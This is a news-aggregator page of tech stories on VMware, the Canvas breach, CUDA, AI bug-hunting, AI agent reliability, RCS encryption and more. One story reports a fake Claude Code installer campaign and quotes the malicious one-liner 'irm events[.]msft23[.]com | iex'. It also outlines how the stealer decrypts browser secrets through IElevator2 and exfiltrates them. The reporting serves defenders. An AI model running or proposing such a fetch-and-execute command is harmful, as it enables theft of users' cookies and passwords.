news aggregator

Quit VMware and you’ll emerge with more complex and less capable infrastructure

TheRegister - Mon, 2026-05-11 23:59
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. 
The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

TheRegister - Mon, 2026-05-11 23:16
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. 
After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir

Digg Tries Again, This Time As an AI News Aggregator

Slashdot - Mon, 2026-05-11 23:00
Digg is relaunching again, this time as an AI-focused news aggregator rather than the Reddit-style community site it recently abandoned. TechCrunch reports: On Friday evening, the founder previewed a link to the newly redesigned Digg, which now looks nothing like a Reddit clone and more like the news aggregator it once was. This time around, the site is focused on ranking news -- specifically, AI news to start. In an email to beta testers, the company said the site's goal is to "track the most influential voices in a space" and to surface the news that's actually worth "paying attention to." AI is the area it's testing this idea with, but if successful, Digg will expand to include other topics. The email warned that the site was still raw and "buggy," and was designed more to give users a first look than to serve as its public debut. On the current homepage, Digg showcases four main stories at the top: the most viewed story, a story seeing rising discussion, the fastest-climbing story, and one "In case you missed it" headline. Below that is a ranked list of top stories for the day, complete with engagement metrics like views, comments, likes, and saves. But the twist is that these metrics aren't the ones generated on Digg itself. Instead, Digg is ingesting content from X in real-time to determine what's being discussed, while also performing sentiment analysis, clustering, and signal detection to determine what matters most. [...] The site also ranks the top 1,000 people involved in AI, as well as the top companies and the top politicians focused on AI issues.
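The engagement-weighted ranking Digg describes can be sketched in a few lines. Everything below - the weights, field names, and sample stories - is invented for illustration; it is not Digg's actual scoring logic.

```python
# Toy version of an engagement-based story ranker: combine views, comments,
# likes, and saves into one weighted score and sort descending. The weights
# and stories are made up for illustration.

def rank_stories(stories, weights=None):
    """Return stories sorted by a weighted engagement score, highest first."""
    weights = weights or {"views": 1.0, "comments": 5.0, "likes": 2.0, "saves": 4.0}

    def score(story):
        return sum(weights[k] * story.get(k, 0) for k in weights)

    return sorted(stories, key=score, reverse=True)

stories = [
    {"title": "Model X released", "views": 1000, "comments": 10, "likes": 50, "saves": 5},
    {"title": "Chip shortage",    "views": 400,  "comments": 80, "likes": 20, "saves": 30},
]
top = rank_stories(stories)  # "Model X released" scores 1170 vs 960
```

A real system would, as the article notes, also fold in sentiment analysis, clustering, and velocity signals rather than raw counts alone.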

Read more of this story at Slashdot.

Categories: Linux fréttir

CUDA Proves Nvidia Is a Software Company

Slashdot - Mon, 2026-05-11 22:00
Nvidia's real AI moat isn't "a piece of hardware," writes Wired's Sheon Han. It's CUDA: a mature, deeply optimized software ecosystem that keeps machine-learning workloads tied to Nvidia GPUs. An anonymous reader quotes a report from Wired: What sounds like a chemical compound banned by the FDA may be the one true moat in AI. CUDA technically stands for Compute Unified Device Architecture, but much like laser or scuba, no one bothers to expand the acronym; we just say "KOO-duh." So what is this all-important treasure good for? If forced to give a one-word answer: parallelization. Here's a simple example. Let's say we task a machine with filling out a 9x9 multiplication table. Using a computer with a single core, all 81 operations are executed dutifully one by one. But a GPU with nine cores can assign tasks so that each core takes a different column -- one from 1x1 to 1x9, another from 2x1 to 2x9, and so on -- for a ninefold speed gain. Modern GPUs can be even cleverer. For example, if programmed to recognize commutativity -- 7x9 = 9x7 -- they can avoid duplicate work, reducing 81 operations to 45, nearly halving the workload. When a single training run costs a hundred million dollars, every optimization counts. Nvidia's GPUs were originally built to render graphics for video games. In the early 2000s, a Stanford PhD student named Ian Buck, who first got into GPUs as a gamer, realized their architecture could be repurposed for general high-performance computing. He created a programming language called Brook, was hired by Nvidia, and, with John Nickolls, led the development of CUDA. If AI ushers in the age of a permanent white-collar underclass and autonomous weapons, just know that it would all be because someone somewhere playing Doom thought a demon's scrotum should jiggle at 60 frames per second. CUDA is not a programming language in itself but a "platform." 
I use that weasel word because, not unlike how The New York Times is a newspaper that's also a gaming company, CUDA has, over the years, become a nested bundle of software libraries for AI. Each function shaves nanoseconds off single mathematical operations -- added up, they make GPUs, in industry parlance, go brrr. A modern graphics card is not just a circuit board crammed with chips and memory and fans. It's an elaborate confection of cache hierarchies and specialized units called "tensor cores" and "streaming multiprocessors." In that sense, what chip companies sell is like a professional kitchen, and more cores are akin to more grilling stations. But even a kitchen with 30 grilling stations won't run any faster without a capable head chef deftly assigning tasks -- as CUDA does for GPU cores. To extend the metaphor, hand-tuned CUDA libraries optimized for one matrix operation are the equivalent of kitchen tools designed for a single job and nothing more -- a cherry pitter, a shrimp deveiner -- which are indulgences for home cooks but not if you have 10,000 shrimp guts to yank out. Which brings us back to DeepSeek. Its engineers went below this already deep layer of abstraction to work directly in PTX, a kind of assembly language for Nvidia GPUs. Let's say the task is peeling garlic. An unoptimized GPU would go: "Peel the skin with your fingernails." CUDA can instruct: "Smash the clove with the flat of a knife." PTX lets you dictate every sub-instruction: "Lift the blade 2.35 inches above the cutting board, make it parallel to the clove's equator, and strike downward with your palm at a force of 36.2 newtons." "You can begin to see why CUDA is so valuable to Nvidia -- and so hard for anyone else to touch," writes Han. "Tuning GPU performance is a gnarly problem. You can't just conscript some tender-footed undergrad on Market Street, hand them a Claude Max plan, and expect them to hack GPU kernels. 
Writing at this level is a grindsome enterprise -- unless you're a cracker-jack programmer at DeepSeek..." Han goes on to argue that rivals like AMD and Intel offer competitive specs on paper, but their software stacks have struggled with bugs, compatibility issues, and weak adoption. As a result, Nvidia has built an Apple-like moat around AI computing, leaving the industry dependent on its expensive hardware.
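The article's multiplication-table example is easy to check in plain, serial Python. This only illustrates the arithmetic savings from exploiting commutativity - it is not GPU code, and the real win described above comes from spreading the work across cores.

```python
# A full 9x9 multiplication table takes 81 products, but since i*j == j*i,
# only the unordered pairs with i <= j (45 of them) need computing; the
# rest can be mirrored. Serial sketch of the counting argument only.

def full_table(n=9):
    """Every (i, j, i*j) entry: n*n products."""
    return [(i, j, i * j) for i in range(1, n + 1) for j in range(1, n + 1)]

def deduplicated_table(n=9):
    """One entry per unordered pair: n*(n+1)/2 products."""
    return [(i, j, i * j) for i in range(1, n + 1) for j in range(i, n + 1)]

print(len(full_table()), len(deduplicated_table()))  # 81 45
```

On a GPU, the column-per-core split the article describes would map each core to one value of i; the commutativity trick then nearly halves the total work, as the piece says.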

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic's Bug-Hunting Mythos Was Greatest Marketing Stunt Ever, Says cURL Creator

Slashdot - Mon, 2026-05-11 21:00
cURL creator Daniel Stenberg says Anthropic's hyped Mythos bug-hunting model found only one confirmed low-severity vulnerability in cURL, plus a few non-security bugs, after he expected a much longer list. He argues Mythos may be useful, but not meaningfully beyond other modern AI code-analysis tools. "My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing," Stenberg said in a blog post. "I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos." He went on to call Mythos "an amazingly successful marketing stunt for sure." The Register reports: Stenberg explained in a Monday blog post that he was promised access to Anthropic's Mythos model - sort of - through the AI biz's Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl's codebase and later sent him a report. "It's not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway," Stenberg explained. "Getting the tool to generate a first proper scan and analysis would be great, whoever did it." That scan, which analyzed curl's git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were "confirmed security vulnerabilities" in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report "felt like nothing," and that feeling was further validated by a review of Mythos' findings. 
"Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability," Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. "The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June," the cURL meister noted. "The flaw is not going to make anyone grasp for breath."

Read more of this story at Slashdot.

Categories: Linux fréttir

Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line

TheRegister - Mon, 2026-05-11 20:54
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the emulator treats the terminal window itself as a 3D canvas: it supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. 
“But everything comes with a cost, especially the spinning rat cursor.”

Building the fourth temple

Parmaksiz’s desire to push terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... 
I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
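The separation Parmaksiz describes - terminal emulation on one side, presentation on the other - can be illustrated with a deliberately tiny sketch. The names and structure below are invented for illustration; Ratty's real code is Rust built on Ratatui and Bevy, and nothing here mirrors its actual API.

```python
# Invented sketch of an emulation/presentation split: one object owns the
# terminal state (a grid of cells), and a separate renderer decides how
# that state is displayed. A GPU-backed 3D presenter could consume the
# same state without the emulation side knowing or caring.

class TerminalState:
    """Holds what the terminal contains, with no opinion on how it looks."""
    def __init__(self, cols, rows):
        self.cols, self.rows = cols, rows
        self.cells = [[" "] * cols for _ in range(rows)]
        self.cursor = (0, 0)

    def write(self, text):
        x, y = self.cursor
        for ch in text:
            if ch == "\n" or x >= self.cols:  # newline or soft wrap
                x, y = 0, y + 1
                if ch == "\n":
                    continue
            if y < self.rows:
                self.cells[y][x] = ch
                x += 1
        self.cursor = (x, y)

def render_plain(state):
    """One possible presenter: plain text. A 3D scene would be another."""
    return "\n".join("".join(row).rstrip() for row in state.cells).rstrip("\n")

term = TerminalState(10, 3)
term.write("hi\nworld")
print(render_plain(term))  # hi / world on two lines
```

The point of the split, as in Ratty, is that swapping `render_plain` for a fancier presenter requires no changes to the emulation side at all.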
Categories: Linux fréttir

Microsoft researchers find AI models and agents can't handle long-running tasks

TheRegister - Mon, 2026-05-11 20:50
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. 
The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They found only one domain that qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. 
Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
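The accounting task described above - split a ledger into per-category files, then merge them back chronologically - has a simple reference implementation, which is exactly what makes lossy model behavior measurable. The rows below are invented; DELEGATE-52 itself uses a real Hack Club ledger as the seed document.

```python
# Sketch of the DELEGATE-52 accounting round-trip: split a ledger by
# category, merge chronologically, and verify nothing was lost. A faithful
# "agent" should reproduce the seed document exactly. Ledger rows invented.

from collections import defaultdict

ledger = [
    ("2026-01-03", "travel",    -120.00),
    ("2026-01-05", "donations",  500.00),
    ("2026-01-09", "travel",     -60.00),
    ("2026-01-12", "supplies",   -35.50),
]

def split_by_category(rows):
    """One bucket per category, preserving each bucket's original order."""
    buckets = defaultdict(list)
    for row in rows:
        buckets[row[1]].append(row)
    return dict(buckets)

def merge_chronologically(buckets):
    """Recombine all buckets, sorted by date (ISO strings sort correctly)."""
    return sorted((r for rows in buckets.values() for r in rows),
                  key=lambda r: r[0])

round_tripped = merge_chronologically(split_by_category(ledger))
assert round_tripped == ledger  # zero degradation: the benchmark's bar
```

The benchmark's degradation scores effectively measure how far a model's output drifts from this kind of exact round-trip, which is why content silently lost in a single interaction shows up as a 10-to-30-point drop.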
Categories: Linux fréttir

Cookie thieves caught stealing dev secrets via fake Claude Code installers

TheRegister - Mon, 2026-05-11 20:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer, substituting an attacker-controlled command. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers by exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. 
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command fetches an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but falls back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. 
The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because “behavioral rule sets that look at the native PE in isolation will see nothing actionable.” “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: Linux fréttir

GM Cutting Hundreds of Salaried IT Workers As It Trims Costs, Evaluates Needs

Slashdot - Mon, 2026-05-11 20:00
GM is laying off about 500 to 600 salaried IT workers, mainly in Austin, Texas, and Warren, Michigan, as it restructures its technology organization and trims costs. "GM is transforming its Information Technology organization to better position the company for the future. As part of that work, we have made the difficult decision to eliminate certain roles globally. We are grateful for the contributions of the employees affected and are committed to supporting them through this transition," the automaker said in an emailed statement. CNBC reports: GM reported employing about 68,000 salaried workers globally as of the end of last year, including 47,000 white-collar employees in the U.S. Despite Monday's cuts, GM is still hiring IT workers. The company has 82 open IT positions, including roles in artificial intelligence, motorsports, and autonomous vehicles, according to the automaker's careers website.

Read more of this story at Slashdot.

Categories: Linux fréttir

iPhone-Android RCS Conversations Are End-To-End Encrypted In iOS 26.5

Slashdot - Mon, 2026-05-11 19:00
Apple says end-to-end encryption for RCS messages between iPhone and Android is now available in iOS 26.5, though the feature is still considered beta and depends on carrier support on both sides. MacRumors reports: Apple says that it worked with Google to lead a cross-industry effort to add E2EE to RCS. iOS users will need iOS 26.5, while Android users will need the latest version of Google Messages. End-to-end encryption is on by default, and there is a toggle for it in the Messages section of the Settings app. Encrypted messages are denoted with a small lock symbol. On iPhones not running iOS 26.5, RCS messages between iPhone and Android users do not have E2EE, but the new update will put Android to iPhone conversations on par with iPhone to iPhone conversations that are encrypted through iMessage. Along with Google, Apple worked with the GSM Association to implement E2EE for RCS messages. E2EE is part of the RCS Universal Profile 3.0, published with Apple's help and built on the Messaging Layer Security protocol. RCS Universal Profile 3.0 also includes editing and deleting messages, cross-platform Tapback support, and replying to specific messages inline during cross-platform conversations.

Read more of this story at Slashdot.

Categories: Linux fréttir

OpenAI can't have incompetent AI consultants ruining the market, so bought its own

TheRegister - Mon, 2026-05-11 18:33
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find enough value in its models to justify the spending that generates revenue Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises unlock the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, but several consultancies, including Capgemini, Bain, and yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will launch a diagnostic to determine where AI can create the most value, then carry out a select set of proof-of-concept projects. If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro would bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. 
Whether enterprises should hitch their wagon to OpenAI’s success at a time when inference providers and model devs are already jacking prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. For one million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
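At the reported list prices, per-request costs are easy to estimate. A hypothetical back-of-envelope sketch (the token counts below are made-up illustration values, not real usage figures):

```python
# Reported GPT-5.5 list prices, USD per one million tokens.
PRICE_PER_MTOK = {"input": 5.00, "cached_input": 0.50, "output": 30.00}

def request_cost(tokens):
    """Dollar cost of one API call, given token counts per category."""
    return sum(count / 1_000_000 * PRICE_PER_MTOK[kind]
               for kind, count in tokens.items())

# Example: 10,000 fresh input tokens plus 2,000 output tokens.
print(round(request_cost({"input": 10_000, "output": 2_000}), 2))  # 0.11
```

Output tokens dominate at these rates: 2,000 output tokens ($0.06) cost more than 10,000 input tokens ($0.05).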
Categories: Linux fréttir

Students Boo Commencement Speaker After She Calls AI the 'Next Industrial Revolution'

Slashdot - Mon, 2026-05-11 18:00
An anonymous reader quotes a report from 404 Media: Speaking to graduates of University of Central Florida's College of Arts and Humanities and Nicholson School of Communication and Media on May 8, commencement speaker Gloria Caulfield, vice president of strategic alliances at Tavistock Group, told graduating humanities students that AI is the "next industrial revolution," and was met with thousands of booing graduates. "And let's face it, change can be daunting. The rise of artificial intelligence is the next industrial revolution," Caulfield said. At that point, murmurs rippled through the crowd. Caulfield paused, and the crowd erupted into boos. "Oh, what happened?" Caulfield said, turning around with her hands out. "Okay, I struck a chord. May I finish?" Someone in the crowd yelled, "AI SUCKS!" Her speech begins around the hour and 15 minute mark in the UCF livestream. [...] Before the industrial revolution comment, Caulfield praised Jeff Bezos for his passion and use of Amazon as a "stepping stone" to his real dream: spaceflight. Rattled after the crowd's reaction, she continued her speech: "Only a few years ago, AI was not a factor in our lives." The crowd cheered. "Okay. We've got a bipolar topic here I see," Caulfield said. "And now AI capabilities are in the palm of our hands." The crowd booed again. "I love it, passion, let's go," she said. "AI is beginning to challenge all major sectors to find their highest and best use," she continued. "Okay, I don't want any giggles when I say this. We have been through this before, these industrial revolutions. In my graduation era, we were faced with the launch of the internet." She goes on to talk about how cellphones used to be the size of briefcases. "At that time we had no idea how any of these technologies would impact the world and our lives. [...] These were some of the same trepidations and concerns we are now facing. 
But ultimately it was a game changer for global economic development and the proliferation of new businesses that never existed like Apple and Google and Meta and so many others, and not to mention countless job opportunities. So being an optimist here, AI alongside human intelligence has the potential to help us solve some of humanity's greatest problems. Many of you in this graduating class will play a role in making this happen."

Read more of this story at Slashdot.

Categories: Linux fréttir

Debian 14 cracks down on unreproducible packages

TheRegister - Mon, 2026-05-11 17:04
